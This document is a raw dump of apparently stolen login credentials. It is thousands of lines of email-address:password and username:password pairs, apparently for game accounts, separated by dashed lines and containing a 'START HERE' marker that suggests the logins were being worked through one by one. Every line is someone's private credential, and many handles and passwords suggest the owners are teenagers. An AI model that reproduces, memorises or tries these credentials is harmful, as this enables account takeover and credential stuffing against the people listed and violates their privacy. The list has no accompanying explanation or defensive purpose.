9:kanga\r\ncocioguy:coco11\r\ndanielwalker99@hotmail.com:blades\r\nandrew.mac123@hotmail.co.uk:busby\r\ncarlohelder@hotmail.com:qazqaz1\r\nwollaby23@hotmail.co.uk:laptop1\r\nfallstownman@yahoo.com:rockies\r\ntdwpcc@hotmail.com:fuckyou10\r\nsharkboy92008@hotmail.com:massive\r\nconnor.clavin@live.com:shadow12\r\naustinsweat@yahoo.com:skateboard\r\njoao_figueiredo1@hotmail.com:corleone\r\ndjscorch18@gmail.com:theonly1\r\nante_pain@hotmail.com:rammstein\r\ncasey_howlett@live.com:truck\r\nlogan_rocque@hotmail.com:justin22\r\nmatty789uk@hotmail.co.uk:alice123\r\nyoung_soldier3@yahoo.com:soccer3\r\ndfar13@yahoo.com:darkstar1\r\nmarijndelaat@home.nl:bolster\r\nswimtoomuch197@aim.com:downing\r\ndillbell2k9@hotmail.co.uk:noonoo\r\nkazukixx@hotmail.com:spiker\r\ndombo_ikke_@hotmail.com:dominic\r\nvinceduca1a@hotmail.com:abcd1234\r\nnico_lodewijks@hotmail.com:neptunes\r\nprfjpl@aol.com:ben\r\nJackalexauty@yahoo.co.uk:willow\r\ndan_town@hotmail.co.uk:henleys\r\nedgaras98@gmail.com:scimitar\r\njakeryan15@hotmail.co.uk:nutter\r\nabert_23@hotmail.com:blackdog\r\nMGS360@googlemail.com:andreas\r\nthbonzo@hotmail.com:030393\r\nlabdor6@yahoo.com:chris1\r\nDrago_edge@hotmail.com:winace\r\nsynystersimonninjashizzle@hotmail.co.uk:smeghead\r\nryanthelion010@hotmail.co.uk:temple\r\njamiecarter95@hotmail.co.uk:awesome\r\nrepcal@live.com:halld\r\nJann_@live.be:071194\r\nville.anttonen@hotmail.com:033196\r\nkhoury.russell@yahoo.com:phoenix\r\nbrett@flettre.com:159111\r\nronakp93@yahoo.com:lemon\r\nlukebhardy@hotmail.com:190491\r\nlil-shit23@hotmail.com:passw0rd\r\nkanewright@live.co.uk:caine\r\nmkmmsrk@yahoo.com:awsome\r\nrobbe.bormans@hotmail.com:147896325\r\ncrouse6684@comcast.net:alive\r\nrockontyler@hotmail.com:midnight\r\naditya.29@hotmail.com:immortal\r\nliland@verizon.net:butthole\r\nsnake4444100@yahoo.com:298570\r\nSamboni@btinternet.com:wicked1\r\nglibberpudding@msn.com:donald\r\nmatchuC@yahoo.com:04041994\r\nrobsonlpark@hotmail.com:chester\r\nkittykitty1000@hotmail.com:munchkin\r\njbailey191@gmail.com:panther\r\nmarc_1411_95@hotmail.com:cassis\r\ngargaros@live.com:danger\r\ncodybole@yahoo.com:suzuki\r\nandre.as.henrik.sson@hotmail.com:q1w2e3r4\r\nponyboyandy@aol.com:shredder\r\nnick_da_man180@hotmail.com:aenima\r\ntroyaaron11@yahoo.com:shark\r\nryanreble@msn.com:maxie\r\nbjg33@hotmail.com:plate\r\nchaserulz0423@hotmail.com:charlie1\r\nweil59@hotmail.co.uk:submit\r\nw3x1337@hotmail.com:svensson\r\nLafk8fish@gmail.com:asdf123\r\nmentoboy45@hotmail.co.uk:haman\r\ndogking2@hotmail.com:daewoo\r\nc.duffer@yahoo.com:chance\r\nejbmal518@yahoo.co.nz:jeremiah\r\nheladoboy@gmail.com:102893\r\ntakktanel@gmail.com:kapral\r\nwesdeking@hotmail.com:wes\r\nijaazmgp@hotmail.com:stronger\r\naffan121@hotmail.com:muhammad\r\nadamcollins307@hotmail.co.uk:everton\r\nbrhotwheels@sbcglobal.net:ridgeway\r\ncborangeapple@gmail.com:colt45\r\nkrissytof@hotmail.com:memories\r\nnantha_kumar99@yahoo.com:09011984\r\ngoto.tyan@gmail.com:lemonade\r\ntobiasm9@yahoo.com:10041996\r\nlaurensperdok@gmail.com:laurens\r\nniqqaplox@hotmail.com:friend\r\nlil7phil@yahoo.com:abcd1234\r\nxownedploxx@live.com:crawdad\r\npuppyskater12@gmail.com:devourment\r\nhsteele13@yahoo.com:redred\r\nfootball_lorenzo@hotmail.com:gibson\r\nhorribleballers@gmail.com:online\r\ndevon_snow16@hotmail.com:snickers\r\nmjmcbride1@msn.com:abc321\r\njallenrausch@hotmail.com:killed\r\nthree-n9runners@hotmail.com:bartek\r\ndellgateway101@yahoo.com:green1\r\ndallas59@ymail.com:fungis\r\nantoniogonzalez97@hotmail.com:azsxdc\r\najschaefs@gmail.com:marty\r\nbaaangwtf@hotmail.com:robbie\r\ncmac-@hotmail.com:cynthia\r\nmurat-yargin@hotmail.com:roadster\r\n------------------------------------...east@yahoo.com:slayer12\r\ngoldendefense@yahoo.com:chitty\r\njoeymadzai@yahoo.com:nightman\r\nmaxpowner@hotmail.com:aqwzsx\r\njesssicaftw@hotmail.com:superman123\r\njdinodino@yahoo.com:dynasty1\r\nJasperfarmer@live.com:Jazzband\r\npotenagle@hotmail.com:123544\r\nbug390@live.ca:12stars\r\nchris_mizuguchi@hotmail.com:417245\r\nevonic@live.ca:wonders\r\nt--murphy@hotmail.com:coughup\r\nvfdc2@hotmail.com:juggalo\r\nsifu_magic@yahoo.com:redred\r\nSimon_Hunley@hotmail.com:kern12\r\nbrandonraymartin@yahoo.com:brandon321\r\npwnr4nge@hotmail.com:miamoo\r\njames_cos97@hotmail.com:cossie\r\nthemikeyspikey@hotmail.com:scampie\r\nabc_345@live.com:1234567a\r\nnickeos@live.ca:pretty1\r\nkylefguy@hotmail.co.uk:1234qwer\r\nNuclearwasteland@yahoo.com:idontcare\r\nbowdsters@hotmail.ca:helpyou\r\njoshdiazz@yahoo.com:addadd\r\niownuz@live.com.au:eternity\r\nWorldofAQ@yahoo.com:wootwoot\r\nmineoit@hotmail.com:p0k3m0n\r\nthe_great_one45@hotmail.com:44magnum\r\nmitchelj97@hotmail.com:superman123\r\nguitardude29@live.com:dumdum\r\nbellodarren@yahoo.com:pimpin1\r\nkundingerlink@yahoo.com:159753852456\r\nliamrocks816@hotmail.com:kahnawake\r\nspamfrodo@yahoo.com:billyboy\r\njericho_71@hotmail.com:pimp22\r\nturners_2_fast@hotmail.com:staples\r\nrandallewalker@yahoo.com:usuck12\r\njosta11@live.nl:bounty123\r\nsikky14@hotmail.com:northeast1\r\ntimmmettje@hotmail.com:jens123\r\nbenjeeez@yahoo.co.nz:friendz\r\nDamien2763@hotmail.com:acer123\r\nconnor_003@hotmail.com:abyss3\r\nmattieworks23@live.nl:compaq1\r\nmerchant.69@hotmail.com:honker\r\nBraedynashley@hotmail.com:scooters\r\nihave3parakeets@yahoo.com:matthew89\r\ndragonx566@yahoo.com:278566\r\nmewesley64@hotmail.com:cat3rpillar\r\nsteven_vangster_boi@hotmail.com:pokeme\r\nkjellsieval@hotmail.com:clanwars\r\nTitan_V12@yahoo.com.br:silveira\r\njarobertson91@yahoo.com:10201991\r\nbalindameans@yahoo.com:nicolas2\r\nnicki_bruzzese22@hotmail.com:skulls\r\nNick_argent@hotmail.com:programs\r\nshehot1152@hotmail.com:noob11\r\ncurt485@hotmail.com:pa55w0rd\r\nccccccjkkjqqxx123@yahoo.com:dead123\r\nfacebookfan@live.nl:geheim\r\nbloodchain87@hotmail.com:champ123\r\noppiemiller@yahoo.com:warden\r\nelliottgh@hotmail.co.uk:220194\r\nmatt.steele@hotmail.com:matt123\r\ngamebox123@hotmail.fr:jamaica\r\nstefan-princen@hotmail.com:appelflap\r\n--------------------------------------------------\r\nmy treason:fudgedog\r\ntato408:lawrence\r\njohn0death:mewtwo\r\njoeymadzai@yahoo.com:nightman\r\nis_nate@hotmail.com:melanie\r\n------------------------------------------------\r\ntierny 9:kanga\r\nrexonamacho:corleone\r\nUhScot:june1995\r\nhaldown:adam13\r\njensie1996:moter\r\nrskiller129:breakdance\r\nGhostxp5:awsome\r\n23475:jethro\r\ngoin far68:remember\r\nsean485134:numlock\r\ntienkarat:fruit\r\ndwoulfe4:danny23\r\ngodlyguy123:jesus123\r\nphinoks2kill:w1nner\r\nbryden672:kirkland\r\n-----------------------------xshaadow@hotmail.com:azsxdc\r\nsnowdude_123@hotmail.com:dooley\r\ndmitri.koort@gmail.com:kamikazi\r\ntowrissnick@hotmail.com:solaris\r\nrichthebomb11@aim.com:richie\r\nflashes65@gmail.com:12291995\r\npitsapoiss_kristo@hotmail.com:emane\r\njonte_gnr@hotmail.com:linkon\r\nhazza.taylor@hotmail.com:hazard\r\nneffendeule@hotmail.com:normaal\r\nangelmoroco@hotmail.com:toshiba\r\nsoffer@hotmail.co.uk:jayden\r\nKhanshak9@hotmail.com:lollipop\r\nknakenlol@gmail.com:handdoek\r\ntobias.b@live.nl:billen\r\nsuper_madalin2006@yahoo.com:250295\r\nChris33baseball@yahoo.com:burger\r\njakob.bergvall@hotmail.com:swallow\r\nAlexander_2008@hotmail.co.uk:danger\r\nkristakristian@hotmail.com:060897\r\nnisani98@yahoo.com:christal\r\njackmahon@msn.com:haymaker\r\nstudent.david@live.be:vandorpe\r\nblakephillips24@live.com:spanky\r\ndakesbaked@aol.com:issues\r\njordydragon_vegter@hotmail.com:forsale\r\nbuddaboy519@gmail.com:awesome\r\ntom.was.here@hotmail.com:treasure\r\nJamesTheB3ast@yahoo.com:julia2\r\nbese165@hotmail.com:115599\r\nsuperjade12@aol.com:georgina\r\nnfl89terry@live.com:11051996\r\nSandik94@inbox.lv:marsis\r\nfmeaa@seznam.cz:brezina\r\norpalmer@hotmail.com:doberman\r\nPuxi.96@hotmail.com:Jerusalem\r\nlukas.sablinskas@gmail.com:lukas\r\ncody_123cool@hotmail.com:bowlby\r\nswaggerfoot@live.com:popcorn\r\naaronkarns@yahoo.com:cocococo\r\nturners_2_fast@hotmail.com:staples\r\njeffrey12144@yahoo.com:greens\r\narskabob@hotmail.com:bagheera\r\nmichaeledwards1995@hotmail.com:climbing\r\ntabbycat232@gmail.com:crunch\r\narchaic16@gmail.com:battle\r\njelavaggi@gmail.com:juanito\r\nbugsbunny1927@hotmail.com:holden\r\nbigbeatdown2@yahoo.com:redsox\r\nboyjman@live.com.au:whitton\r\nTubzie_turner@hotmail.com:staples\r\njacktaylor123@hotmail.co.uk:badman\r\nentershikari2009@hotmail.co.uk:shoshone\r\nlordarmel@gmail.com:bowser\r\ndanieltheownage@hotmail.com:raiden\r\ntrevor_man_mi@yahoo.com:loper\r\nhipoopface@hotmail.com:cool13\r\ngille-@live.se:password123\r\nivzackvi@gmail.com:kardon\r\ndjscorch18@gmail.com:theonly1\r\nconnor.clavin@live.com:shadow12\r\nlogan_rocque@hotmail.com:justin22\r\nbob20091938@hotmail.co.uk:1123581321\r\nsejef_5@hotmail.com:speedy1\r\nits-me-brandon@hotmail.com:pokemon12\r\nboston15hockey@aol.com:blue32\r\ni-ownnoobs@hotmail.com:sexybabes\r\nsillybillyboi@yahoo.ca:lindberg\r\nestonipower@hotmail.com:heaven1\r\nspikeman00120@yahoo.com:testing\r\ntylerbox117@yahoo.com:michael2\r\natomical123@hotmail.com:140993\r\niwantanipod06@gmail.com:102893\r\nSecrom76@yahoo.com:pooppoop\r\nleo.silva44@gmail.com:weapon\r\neagamezz@gmail.com:woofwoof\r\nvitodebe@hotmail.com:123qweasd\r\ncoolboy9083@gmail.com:matias\r\nrhettisawesome@hotmail.com:campbell\r\njeremylaptop10@hotmail.com:coolest\r\n--------------------------------------------------------------------\r\nrsplayer@hotmail.be:aqzsed\r\nalmost_skater2008@yahoo.com:skill3r4lif3\r\nalden.fever@hotmail.co.uk:helpme1\r\n--------------------------------------------------\r\ndrewster90@charter.net:littlebit\r\nxxbileeexx@hotmail.com:lolowned\r\ndebraes@hotmail.com:anderlecht\r\njagfan2233@comcast.net:magicman\r\nthechelskikid@aol.com:raneri\r\nromangemini@hotmail.com:gordiehowe\r\navery_dude911@hotmail.com:sports12\r\nspencerlivingston@hotmail.com:windwaker\r\nfreestuffploxlol@aol.com:fenner\r\nkstbitter@aol.com:kitkat\r\nrhettisawesome@hotmail.com:campbell\r\ndodgyman-1155@hotmail.com:manuel\r\naBuuuuuZe@live.co.uk:poppycat\r\nthesnomann@hotmail.com:cheesecake\r\ndevilkiller5555@gmail.com:microsoft\r\njoshfenner93@hotmail.co.uk:idunno\r\njohn-afc999@hotmail.co.uk:mancity\r\naustinlalonde@hotmail.com:austin12\r\nngell@inbox.lv:210391\r\nmatthew4115@hotmail.co.uk:arsenal14\r\nyi.fan.yi@gmail.com:icecream1\r\nmdgonyon@yahoo.com:123four\r\nhockeyplayas3@gmail.com:zumiez\r\neagamezz@gmail.com:woofwoof\r\nleb4life2010@hotmail.com:eatmyshit\r\nkeaton_100@hotmail.com:smiles\r\n-volcom@live.com:nymets\r\ncod_black_ops33@yahoo.com:california\r\nlil_bulldog_stud@hotmail.com:lebanon\r\nreece-lusmore@hotmail.co.uk:bartsimpson\r\ncharles_duguay@hotmail.qc.ca:mannequin\r\nmason22@comcast.net:tony22\r\nkweaver1234@yahoo.com:joshua03\r\nmikeymad1311@hotmail.com:mikey123\r\nMixicann@yahoo.com:214365\r\nsuperlapie@hotmail.com:devildog\r\nvitodebe@hotmail.com:123qweasd\r\nkeith.wotsisname@gmail.com:onions\r\nhabbohelppersonal@hotmail.com:anthony12\r\nCantstop206@yahoo.com:102803\r\nhiddenfromch13@gmail.com:masahiro\r\nwereismybrain10@hotmail.com:fuckyou420\r\nHarrydrummer@hotmail.co.uk:trampoline\r\ntylerzorich@yahoo.com:boomer1\r\nwilliamf1337@gmail.com:hellogoodbye\r\ndevinbasham@gmail.com:sanguine\r\nKreuztempler@web.de:maximilian\r\nmidevilswaer@yahoo.com:145632\r\niluvyoubbe@hotmail.co.uk:clayton\r\ncpb1995@gmail.com:yomomma1\r\ntimgrocott77@hotmail.com:subspace\r\nscottieundead@hotmail.com:germany\r\nsmartdev.4eva@gmail.com:swordfish\r\nbasketball_rulez900@hotmail.com:nathan17\r\nhuntingismygirl@gmail.com:carlton\r\nmdog401@hotmail.com:masterman\r\njohnnyboi80895@yahoo.com:robinson\r\ncrazyb_b@hotmail.co.uk:chelsea11\r\njosephwright1990@live.com:simple123\r\nkylebrent_1@hotmail.com:callofduty\r\nmobsterman11@yahoo.com:skater11\r\nTorn_shirt@hotmail.com:phones\r\nmrfrenchie93@aol.com:simmons\r\nesp_kirk@hotmail.com:immovable\r\nmax_skate_basket@hotmail.com:jonny1\r\npup@san.rr.com:poop123\r\ntrevork4@yahoo.com:lamborghini\r\nyogiredsox@gmail.com:1234321\r\nroxas806@gmail.com:matthew5\r\nhhabiba@hotmail.com:salma123\r\nmattmanmkb@hotmail.com:deadman\r\nchicksdigwill@hotmail.com:submit\r\nsnellc13@yahoo.com:clayton\r\nchristiaan-dragon@hotmail.com:135792468\r\nprofotballplayer@hotmail.com:popkorn\r\ntreywarren6006@yahoo.com:scanner\r\njfxtreme@gmail.com:jajaja\r\njamesjmcdaniel@gmail.com:lollipop123\r\ntheunkwon@hotmail.com:sullivan\r\ncoolboy9083@gmail.com:matias\r\ntlelean@hotmail.co.uk:starbuck\r\ntheusefultips@hotmail.co.uk:nathan12\r\nftballbeastsjv@aim.com:darthvader\r\nsfitz7@gmail.com:smoke420\r\nlee.carpenter4@hotmail.com:spartan117\r\nshicken98@hotmail.com:deanna\r\nninjawarzmaster10@yahoo.com:heathy\r\nmatan0601@walla.com:131071\r\nkey.adaniya@gmail.com:bobesponja\r\nzackeryst@me.com:melina\r\nlolll@gmail.com:19981998\r\njakebradshaw1@aol.com:zaphod\r\nrorybutler98@hotmail.co.uk:spore\r\nmasterjosh15@hotmail.com:killer3\r\nobhattacharjya@yahoo.com:mission\r\nxx-dreamweaver-xx@hotmail.co.uk:guardianangel\r\ndnw19960@hotmail.com:nathaniel\r\nbrennen_denomme@hotmail.com:lacrosse\r\nhaloisreligion@gmail.com:marsbar\r\nstian_haua@hotmail.com:general\r\ngonzalez120@gmail.com:helper\r\nwatsonblake97@yahoo.com:blake123\r\ncentopenta.3@hotmail.com:25802580\r\njrichardson.nz@gmail.com:ghandi\r\nbrentrobbins94@yahoo.com:hollister\r\nfartknocker@aol.com:hurricanes\r\nderik_koury@hotmail.com:july22\r\ntyler_renfrow10@yahoo.com:skate1\r\nedcat92@hotmail.com:juan123\r\nTenLogg@web.de:firedragon\r\nlilboo@mitchelltelecom.net:120303\r\ntaylindz@hotmail.com:caverna\r\nherohuntter@hotmail.com:mysterio619\r\njokester91@hotmail.com:buddy123\r\ncbell1219@gmail.com:1346798520\r\nrayyan_iqbal9@hotmail.co.uk:sameer\r\nfreints1@gmail.com:sniper1\r\nhferreira15@hotmail.com:tenerife\r\nblitzm24@yahoo.com:tassie\r\njamesdavies195@hotmail.co.uk:james123\r\nseth.merit@gmail.com:biteme1\r\nrj_strt@yahoo.com:ilovesome1\r\nthaimo_@hotmail.com:maxell\r\njuzforthesakeofcrap@hotmail.com:flaming\r\nnick_myers123@hotmail.com:montreal\r\nspartain117@comcast.net:121277\r\nbryanrans1@gmail.com:loser1\r\nkhmustang44@windstream.net:village\r\nfred3439@yahoo.com:zombie\r\naznsaetern@yahoo.com:mother123\r\ntimjansen19@hotmail.com:welkom01\r\nkenneth.suarez@ymail.com:yankees1\r\njacquelynslaughter1@yahoo.com:jackie1\r\nlilboy555@yahoo.com:killer12\r\ndelinquents-habits@hotmail.com:eljefe\r\nptstatemt2@gmail.com:claudia123\r\nandy_baller@sbcglobal.net:reading\r\npiglet1246@yahoo.com:cisco\r\nbonna110@hotmail.com:tottenham\r\nkurm-lewis@hotmail.co.uk:rotherham\r\nalex_robert_son@hotmail.com:scoobydoo\r\nlilrubenjr@live.com:asswipe1\r\nzachsk8r2@yahoo.com:james123\r\nwillsilveyx@hotmail.co.uk:football123\r\nmolin131@hotmail.com:171192<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<----------------------------------------------------START HERE\r\nbyrondud@aol.com:wells\r\naflyyguy@yahoo.com:zachery1\r\nkobsmob@yahoo.com:national\r\npeter_caranci@yahoo.com:creekside\r\nblomvin@yahoo.com:kittykat1\r\nhaniux44@gmail.com:timmy1\r\nskizzylol@Live.com:blake123\r\npwnedkilla@aim.com:redrock\r\ntimfen@web.de:mistake\r\nphillis1111@yahoo.co.uk:sexygirls\r\njermeb23@yahoo.com:freshman\r\nkevber2@hotmail.com:buffy123\r\nthenoodler1@hotmail.com:mackey\r\ni206larynoi@gmail.com:falcon\r\nbmxrules0105@aol.com:crf450\r\nbmm5190@psu.edu:woodcutting\r\nztimberlake09@gmail.com:sublime\r\nmlgxklutch@aol.com:molly01\r\nsystem.miguel@hotmail.com:sanders\r\nwatlan18@hotmail.com:ducati\r\nvasco_10000@hotmail.com:online\r\nsocerrboi@aol.com:million1\r\njimboysan@gmail.com:babymilo\r\nbleachissick@live.com:jamesdean\r\nbrendanmorgo@hotmail.com:trolley\r\nmsembawy@Hotmail.com:mohamed\r\nBasketballertje_767@hotmail.com:stoned\r\nj_beljaars_96@hotmail.com:skippy\r\nb--rad15@hotmail.com:titans\r\nmcv333@hotmail.co.uk:peanut06\r\ndontforgethisemail29@yahoo.com:hungry\r\njakejw4@yahoo.com:vegeta1\r\narmyboy1@live.nl:jassie\r\nshendo_bok@hotmail.com:martin1\r\nsoccer_kid13@sbcglobal.net:soccerboy\r\njoshuahuke@googlemail.com:bionicle\r\nruben_goleador95@hotmail.com:fifa07\r\nskimboarderboi21@gmail.com:salvation1\r\nkilaplaya@gmail.com:123qweasdzxc\r\nmattantonioli1@gmail.com:awesome\r\nrami_aff@hotmail.com:1234560\r\njgudim14@gmail.com:personal\r\nbobmaon@yahoo.com:unique\r\ndanyon_kemp@hotmail.com:rugby123\r\nabc.aliciris@hotmail.com:joker01\r\njjwong96@yahoo.com:jamesw\r\nrustyspoons2008@hotmail.com:losser\r\ndjehre2k7@yahoo.co.uk:sheeba\r\nshorigerardot@gmail.com:asdf1234\r\nphysicsfx@gmail.com:catching\r\ndane.444@hotmail.com:candace1\r\njustrobbb@live.co.uk:rob123\r\nblin.x-artful@hotmail.de:kennwort\r\nrobert_edwards411@yahoo.com:angel1\r\ntowelies@web.de:mutter\r\njzonda2@hotmail.com:triangle\r\ntbone2820@yahoo.com:225588\r\nmazz3y@hotmail.com:cheek\r\nterrymcguffin1@hotmail.com:compaq123\r\nnikemaster88@googlemail.com:sean123\r\nPengiunn@gmail.com:qaz123\r\njakub_voetballer@hotmail.com:rangerover\r\nlysoack@yahoo.com:slipknot1\r\njordan_jnr@hotmail.com:rubberband\r\najeth1@web.de:gangbang\r\ntifaismyho@yahoo.com:strife\r\njmshimes@yahoo.com:turbo1\r\njeffke_5@hotmail.com:december12\r\nriders-rock-123@hotmail.com:rock123\r\ngraysontowne@hotmail.com:hootie\r\nsteelersfanseven@aim.com:sk8ers\r\njoannesvanthiennen@hotmail.com:nissan350z\r\nnatedoghr@hotmail.com:123098\r\nnxjunkmail@gmail.com:booger\r\nrhaase1@cox.net:riley1\r\ndereklong345@yahoo.com:123451\r\nreddeadrevolter@yahoo.com:cheese1\r\nbuu423@hotmail.com:manuel12\r\njordening14@hotmail.com:rudder\r\nmattmiracle@live.com:cheese2\r\nhansenlu555@gmail.com:drowssap\r\njohnfnc@hotmail.com:24862486\r\ndarkfoxgod@yahoo.com:shorty25\r\nxiiaomako@hotmail.com:takumi\r\nbladedge585@gmail.com:12qwaszx\r\njohnny2kay8@hotmail.com:football123\r\ndeshaun65@gmail.com:cracker1\r\nkango66@hotmail.com:killer1\r\nd_winge@hotmail.com:ranran\r\nsledneck998@hotmail.ca:velocity\r\nbsdreyes1@gmail.com:iloveyouall\r\nBelinda760@hotmail.co.uk:lovelovelove\r\nplayb0yman@yahoo.com:plus44\r\nbrandonc779@aim.com:loser69\r\nnickel_back_awsome@hotmail.com:marcus123\r\nvebi.ahmeti@hotmail.com:dardani\r\nlaurie887@yahoo.co.uk:mummy1\r\nminustheheat@yahoo.com:coleman\r\nMunkey_dragon5@hotmail.com:titans\r\nceilidhahearn@yahoo.com:192837\r\nthomas_robbo@hotmail.com:gunman\r\ndjdevin177@gmail.com:chamberlain\r\nmarshallfan94@Yahoo.com:baseball94\r\nyounglightning235@gmail.com:yondaime\r\ntruls_kk@hotmail.com:polaris\r\ncrazymane@rocketmail.com:imalive\r\nrange30033@hotmail.co.uk:198912\r\nvapor_101@hotmail.com:smoke\r\nkhris.ranger@hotmail.com:charizard\r\nsoccerocker168@aim.com:matthew11\r\nvendition7@gmail.com:guess2\r\ntrucks_alex@hotmail.com:scania\r\nsam-j-r74@hotmail.co.uk:scruffie\r\nwale415@yahoo.com:dogdog\r\nontherightside@hotmail.com:falcon\r\nownage110001@hotmail.com:pooface\r\nboom-boomx@hotmail.com:wachtwoord\r\niqrazyr@hotmail.com:richard5\r\nswebooy@hotmail.com:sweden\r\nmenno_gjaltema@hotmail.com:destination\r\nro.dri.go@live.com:jeniffer\r\ntaterjon69@yahoo.com:asshole12\r\nhi_scoreking@hotmail.com:promise\r\nGiasson3@hotmail.com:killbill\r\nlinkberryslap@yahoo.com:buster1\r\nmoosee2008@hotmail.com:moomoocow\r\nhellboy_23592@hotmail.com:nicolas1\r\nlebanese_haz@hotmail.com:thedon\r\nwojbal@interia.pl:wojtek\r\nmaxell7857@hotmail.com:deadman\r\nanishkumar45@hotmail.co.uk:gothic1\r\nskate_videogame@yahoo.com:yourmom1\r\ngohandley@gmail.com:griffin\r\nhingerdingerdargen@hotmail.com:edwards\r\ndarkwater50@gmail.com:456789123\r\nmatt2kgold@cox.net:bonnie123\r\nstatixzero@live.com:michael11\r\nguitarlover105@hotmail.co.uk:delboy\r\nhecklerryan@yahoo.com:heckler1\r\nnickster1297@comcast.net:pokemon2\r\nfelix@overbeck-hansen.dk:hansen\r\njkong50@yahoo.com:buddydog\r\nunhallowed@hot.ee:heroes\r\nbigc1239@yahoo.com:naruto14\r\njaan1123@hotmail.com:banaan\r\nbd123100@aol.com:shotgun\r\nbriancapxd@hotmail.com:critical\r\nzerohcontrol@gmail.com:westwood\r\nrimssat22@yahoo.com:walter\r\nadam.agurell@hotmail.com:adamadam\r\nbaked0@live.com:passw0rd\r\nscotty_rulz4@hotmail.com:terminate\r\nmr.makka.pakka@hotmail.com:password123\r\ndakota.payne@ymail.com:lazybones\r\ngibbo91uk@msn.com:passw0rd\r\niggyggy@hotmail.com:iglesias\r\ngangsters1988@hotmail.co.uk:24862486\r\nhaving_fun_raising_hell@hotmail.com:baseball12\r\nsloan61@hotmail.com:preston\r\nmatthewclark1@hotmail.com:birdy\r\neddiemufc@hotmail.com:eddie123\r\neddie_cramer2000@yahoo.com:stopit\r\nbobby15478@yahoo.com:fartman\r\nplatyui@yahoo.com:packer\r\nryanfox1993@hotmail.com:burton\r\nharoldblue97@yahoo.com:blue21\r\nmining_4_u@yahoo.com:thomas15\r\nmarshalmelow@hotmail.com:losers\r\nidontknow9999@hotmail.com:nicknick\r\npatriotnic88@aim.com:nicolas\r\npitbull9432@gmail.com:tucker12\r\nbkernal626@gmail.com:redwine\r\njdwilkins@verizon.net:timberwolves\r\nvitinho890@hotmail.com:campos\r\nmichbrown1973@hotmail.com:master69\r\ndanno2300@sbcglobal.net:rocky5\r\njonathanlateur@gmail.com:sara123\r\nhaileyscomet80@hotmail.com:987412365\r\nrobgrim76@yahoo.com:dragon88\r\nsurfboy-11@hotmail.co.uk:billy123\r\nplperron2@hotmail.fr:hellyeah\r\nNick_Mize@yahoo.com:seven7\r\nmorris.willis@live.co.uk:russell\r\ni.likegames@live.ca:ipodnano\r\nsanghera_44@hotmail.com:250190\r\ns.d.jong@hotmail.com:welkom\r\nnathanfowler101@yahoo.com:john11\r\njordanmc.619@hotmail.co.uk:houses\r\nbarrerajuan1961@yahoo.com:fuckhead\r\ng_lab@hotmail.co.nz:woodcutting\r\nminimasterchief@yahoo.com:quacky\r\njames-coulson@hotmail.com:football3\r\nxionbotscape@yahoo.com:shotgun\r\njaaaaaaaackhd@yahoo.com:pie123\r\nsnoben99@hotmail.com:mamma1\r\nJccobia@gmail.com:keyboard\r\nDarkZach87@yahoo.com:death666\r\nshaynehansen@live.com:gizzmo1\r\njohn0death:mewtwo\r\nemailsstoopid@gmail.com:hockey1\r\ncocioguy:coco11\r\nlouvansoom@hotmail.com:loulou\r\nknightmar233:terry123\r\n94grimsoul:clarissa\r\ncaramelknuckle:santa1\r\nelders30:massive\r\nmk.1991@live.com:naruto1\r\nJuicemiter:yomamma\r\nrexonamacho:corleone\r\nUhScot:june1995\r\nmorgan-wrestle@hotmail.com:makenna\r\nIgnotukas09@gmail.com:masina\r\njensie1996:moter\r\nsansan333333:1346798520\r\neyeball686:mittens\r\nlamsasuke:bulldogs1\r\nrskiller129:breakdance\r\nvanhalen201:devin1\r\ndoomlord Z:021400\r\neugenex:hummer\r\nJust Text:diana123\r\nElite DWB:disturbed1\r\nDefender6890:1123581321\r\nKazekure584:uchiha\r\nvitesse2008:trista\r\nBraddars:pikapika\r\nfraserb13:dragon123\r\ndwoulfe4:danny23\r\njoe howe5:south\r\nvirgilioh1:chivas11\r\n5d6:david123\r\ne c m 1:ezekiel\r\nblindsk8er11:drpepper\r\nAuggied3:dudeman\r\nBagsockb710:certis\r\nrosenzweig7:microsoft\r\nGaz Hotshot:quantum\r\ncommando5671:twelve\r\nfafy622:cool123\r\nokimo156:valent\r\nmond16:monkey666\r\nwmp360:panthers1\r\ngodlyguy123:jesus123\r\nm60kill:population\r\nSoltryphion:ilikepie1\r\nempty cloud9:060289\r\nBruins:bruins\r\n23ninjasnake:april26\r\nPerilyzer:finger11\r\nyoyoboy21108:wesley1\r\nalbgee11:jessica\r\nonetorise:lebanon\r\nSeathion:horses13\r\nwunwai:lovelyme\r\njazzie30:caboose\r\nzzkiller14zz:airforce\r\namin079:qazxsw1\r\nrageraft:yomomma1\r\nkatorahs:sierra2\r\n070wassenaar:123qwe123\r\npetrus81:123qweasdzxc\r\njimsbrat:jimbob\r\nmidevilswaer:145632\r\nufp12:winslow\r\nNickonyl:metalgear\r\ngriffiths365:popop\r\nsavenathan:thequeen\r\nwolfwalker66:wicca\r\n7dustrox:fuckit\r\nblake7120:spike123\r\nelmateo25:deadman\r\nmatthewc299:storm123\r\nscottboyce88:boots123\r\ncheakytoast:starbuck\r\nbig fart45:cowboys\r\nlpc1991:football20\r\nrappglenn:xwings\r\nzxsmythyxz:stuart1\r\nd34th20n:MASTER\r\nHarkis23:112112\r\nuruk hai588:mince\r\nbraunie2323:allstars\r\nyildo26:chiller\r\nchoko156:stich\r\nfoohy pet1:canned\r\nmesengerman0:loser1\r\nzeeztac:france\r\nwulfenhowl:catsrule\r\nbordboy 500:holland\r\npriestley22:carol1\r\nKagamex:empire\r\nJrth3:315200\r\nmrxbox360kid:youtube1\r\ngeth hunter2:people12\r\nshelliemelly:michelle1\r\nherohuntter:mysterio619\r\nJackyGee:trinitron\r\no midget x:phipps\r\ndannyherrick:flipflop\r\nSlasher2189:sloth\r\ntozy34:uchihasasuke\r\nredred021:vodka1\r\nTheravensend:crf450\r\ngotiefan:gotenks\r\ngalactus47:swordfish\r\nyoungfox 14:sk84life\r\nLaryno:falcon\r\njuamaso97:donna\r\nYumbenet:matthew123\r\nwrathofphnx:skater123\r\nopticlops789:darkness1\r\nmastermax911:airport\r\nBubbajake:110393\r\nTempestshade:thesims\r\ncatcan3:rayman\r\ntimberjack13:dozer\r\neysallanu:stoned\r\nfabhaz:firestorm\r\nguurgy:kingdom\r\nur a noob194:rugby123\r\nhav a drink:stjimmy\r\nrocksmashzzz:allstar\r\nkylerobb97:fletch\r\nphatmanslim1:koolkid\r\npheonixslice:milky1\r\nroxindasox:pa55w0rd\r\newandavies2:blue12\r\nhsic34:idunno\r\nwhitetigerak:hambone\r\nVerdana9:250693\r\nkearneykidda:011092\r\nJenna 